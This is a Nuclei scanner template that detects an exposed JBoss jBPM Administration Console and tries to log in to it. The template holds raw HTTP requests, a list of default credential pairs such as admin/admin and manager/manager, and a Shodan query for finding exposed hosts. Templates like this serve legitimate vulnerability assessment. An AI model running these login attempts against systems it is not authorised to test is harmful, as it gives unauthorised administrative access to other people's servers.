nuclei-templates/default-logins/jboss/jboss-jbpm-default-login.yaml

id: jboss-jbpm-default-login

info:
  name: JBoss jBPM Administration Console Default Login
  author: DhiyaneshDk
  severity: high
  description: JBoss jBPM Administration default login information was discovered.
  reference:
    - https://github.com/PortSwigger/j2ee-scan/blob/master/src/main/java/burp/j2ee/issues/impl/JBossjBPMAdminConsole.java
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
    cvss-score: 8.3
    cwe-id: CWE-522
  metadata:
    verified: "true"
    shodan-query: html:"JBossWS"
  tags: jboss,jbpm,default-login

requests:
  - raw:
      - |
        GET /jbpm-console/app/tasks.jsf HTTP/1.1
        Host: {{Hostname}}        

      - |
        POST /jbpm-console/app/j_security_check HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        j_username={{user}}&j_password={{pass}}        

      - |
        GET /jbpm-console/app/tasks.jsf HTTP/1.1
        Host: {{Hostname}}        

    attack: pitchfork
    payloads:
      user:
        - manager
        - user
        - shipper
        - admin
      pass:
        - manager
        - user
        - shipper
        - admin

    stop-at-first-match: true
    cookie-reuse: true
    matchers-condition: and
    matchers:
      - type: word
        part: body_1
        words:
          - "JBoss jBPM Administration Console"

      - type: word
        part: body_3
        words:
          - "</span>Tasks"

      - type: status
        status:
          - 200